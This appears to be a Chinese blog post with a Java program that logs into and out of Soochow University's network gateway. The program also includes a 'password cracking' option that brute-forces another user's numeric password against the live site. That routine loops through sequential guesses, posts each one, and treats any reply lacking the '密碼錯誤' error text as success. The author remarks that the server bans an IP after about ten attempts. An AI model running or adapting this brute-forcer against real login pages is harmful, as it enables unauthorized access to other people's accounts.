最近心血來潮,寫了下利用java模擬登陸,主要應用場合就是沒有圖形化界面的系統上登陸學校的上網網關或者根據需要改成登陸其他網站的代碼。因爲java的跨平臺性,所以應用也比較方便。其實登陸腳本的話感覺用shell最簡單,幾行就能搞定了。
下面是具體代碼:
package test.main;
import java.io.*;
import java.util.Scanner;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import org.apache.commons.httpclient.*;
import org.apache.commons.httpclient.methods.PostMethod;
import org.apache.http.HttpResponse;
public class RetrivePage {
private static HttpClient httpClient=new HttpClient();
public static void information()
{
System.out.println("網關登陸腳本");
System.out.println("1-登陸網關,2-退出網關,3-賬號密碼破解");
}
//登陸方法
public static boolean login_wg()throws HttpException,IOException
{
System.out.println("輸入你的用戶名和密碼,用空格隔開");
String name,password;
String path="<span style="background-color: rgb(51, 0, 51);">http://wg.suda.edu.cn</span>";
//輸入用戶名和密碼
Scanner sc=new Scanner(System.in);
name=sc.next();
password=sc.next();
//得到post方法
PostMethod postMethod =new PostMethod(path);
//設置post方法的參數
NameValuePair postData[]=new NameValuePair[7];
postData[0]=new NameValuePair("TextBox1",name);
postData[1]=new NameValuePair("TextBox2",password);
postData[2]=new NameValuePair("nw","RadioButton1");
postData[3]=new NameValuePair("tm","RadioButton6");
postData[4]=new NameValuePair("Button1","登錄網關");
postData[5]=new NameValuePair("__VIEWSTATE","/wEPDwUKMTM2NjA4NzMwMw9kFgICAQ9kFgQCAQ8WAh4EVGV4dGVkAgsPFgIfAAUw5b2T5YmN5Zyo57q/5Lq65pWwOjxiIHN0eWxlPSdjb2xvcjpyZWQnPjYzMjk8L2I+ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCAUMUmFkaW9CdXR0b24xBQxSYWRpb0J1dHRvbjIFDFJhZGlvQnV0dG9uMwUMUmFkaW9CdXR0b240BQxSYWRpb0J1dHRvbjUFDFJhZGlvQnV0dG9uNgUMUmFkaW9CdXR0b243BQxSYWRpb0J1dHRvbjg=");
postData[6]=new NameValuePair("__EVENTVALIDATION","/wEWDQK1v4akBQLs0bLrBgLs0fbZDALazsi9CQLazrwZAtTO6PQIAtTO/K8HAtTOgIoOAtTOlOUGAtTOuMANAtTOzLwEAoznisYGAoXZ9dsD");
postMethod.setRequestBody(postData);
//執行,返回狀態碼
int status=httpClient.executeMethod(postMethod);
System.out.println(status);
return false;
}
//登出方法
public static boolean logout_wg()throws HttpException,IOException
{
String path="<span style="background-color: rgb(51, 0, 51);">http://wg.suda.edu.cn</span>";
PostMethod postMethod =new PostMethod(path);
NameValuePair postData[]=new NameValuePair[5];
postData[0]=new NameValuePair("Button4","退出網關");
postData[1]=new NameValuePair("nw","RadioButton1");
postData[2]=new NameValuePair("tm","RadioButton6");
postData[3]=new NameValuePair("__VIEWSTATE","/wEPDwUKMTM2NjA4NzMwMw8WAh4IcGFzc3dvcmQFBjE3MzQxMxYCAgEPZBYMAgEPFgIeBFRleHRlZAIDDw8WAh8BZWRkAgUPFgIfAWVkAgcPFgIeB1Zpc2libGVnZAIJDxYCHwJoZAILDxYCHwEFMOW9k+WJjeWcqOe6v+S6uuaVsDo8YiBzdHlsZT0nY29sb3I6cmVkJz41NTU5PC9iPmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFggFDFJhZGlvQnV0dG9uMQUMUmFkaW9CdXR0b24yBQxSYWRpb0J1dHRvbjMFDFJhZGlvQnV0dG9uNAUMUmFkaW9CdXR0b241BQxSYWRpb0J1dHRvbjYFDFJhZGlvQnV0dG9uNwUMUmFkaW9CdXR0b244");
postData[4]=new NameValuePair("__EVENTVALIDATION","/wEWDQKmp+eeBQLs0bLrBgLs0fbZDALazsi9CQLazrwZAtTO6PQIAtTO/K8HAtTOgIoOAtTOlOUGAtTOuMANAtTOzLwEAoznisYGAoXZ9dsD");
postMethod.setRequestBody(postData);
int status=httpClient.executeMethod(postMethod);
System.out.println(status);
return false;
}
//破解用戶名密碼方法,不同網站的情況不同,這個需要個別對待,總體來說寫的不是很好
public static boolean break_password()throws HttpException,IOException
{
int count=0;
System.out.println("輸入你要破解的用戶名");
String name;
String password="173400";
String path="<span style="background-color: rgb(51, 0, 51);">http://wg.suda.edu.cn</span>";
//輸入用戶名和密碼
Scanner sc=new Scanner(System.in);
name=sc.next();
//得到post方法
PostMethod postMethod =new PostMethod(path);
//設置post方法的參數
String regex="密碼錯誤";//要匹配的字符串
Pattern p=Pattern.compile(regex);
NameValuePair postData[]=new NameValuePair[7];
postData[0]=new NameValuePair("TextBox1",name);
postData[1]=new NameValuePair("TextBox2",password);
postData[2]=new NameValuePair("nw","RadioButton1");
postData[3]=new NameValuePair("tm","RadioButton6");
postData[4]=new NameValuePair("Button1","登錄網關");
postData[5]=new NameValuePair("__VIEWSTATE","/wEPDwUKMTM2NjA4NzMwMw9kFgICAQ9kFgQCAQ8WAh4EVGV4dGVkAgsPFgIfAAUw5b2T5YmN5Zyo57q/5Lq65pWwOjxiIHN0eWxlPSdjb2xvcjpyZWQnPjYzMjk8L2I+ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCAUMUmFkaW9CdXR0b24xBQxSYWRpb0J1dHRvbjIFDFJhZGlvQnV0dG9uMwUMUmFkaW9CdXR0b240BQxSYWRpb0J1dHRvbjUFDFJhZGlvQnV0dG9uNgUMUmFkaW9CdXR0b243BQxSYWRpb0J1dHRvbjg=");
postData[6]=new NameValuePair("__EVENTVALIDATION","/wEWDQK1v4akBQLs0bLrBgLs0fbZDALazsi9CQLazrwZAtTO6PQIAtTO/K8HAtTOgIoOAtTOlOUGAtTOuMANAtTOzLwEAoznisYGAoXZ9dsD");
while(true)
{
count++;
int flag=1;
password=String.valueOf(Integer.parseInt(password)+1);
postData[1]=new NameValuePair("TextBox2",password);
postMethod.setRequestBody(postData);
//執行,返回狀態碼
int status=httpClient.executeMethod(postMethod);
//獲得瀏覽器返回的網頁
String index=postMethod.getResponseBodyAsString();
//System.out.println(index);
Matcher m=p.matcher(index);
while(m.find())
{
//System.out.println("密碼錯誤");
flag=0;
postMethod.recycle();//
break;
}
if(flag==1)
{
System.out.println("密碼爲"+password);
return true;
}
if(count>=10000)
{
System.out.println("時間太長退出");
break;
}
}
return false;
}
//測試
public static void main(String args[])
{
RetrivePage.information();
try
{
Scanner sc=new Scanner(System.in);
int flag=sc.nextInt();
//判斷用戶輸入操作
switch(flag)
{
case 1:{RetrivePage.login_wg();break;}
case 2:{RetrivePage.logout_wg();break;}
case 3:{RetrivePage.break_password();break;}
}
}catch(HttpException e)
{
e.printStackTrace();
}catch(IOException e)
{
e.printStackTrace();
}
}
}
這個只是一個基本示例,具體的話就能根據需要來進行更改來完成想要達到的效果,當然很多服務器也對這類的防刷做了很多的應對措施,很多時候暴力破解用戶密碼是不成功的,我這裏的破解密碼主要的思路就是利用正則表達式匹配密碼錯誤時返回的“密碼錯誤”來達到暴力破解的目的,但是貌似學校的服務器做了記錄了IP,在短時間內連續訪問超過10次的話就會被禁止繼續訪問了,要過個幾個小時才能訪問。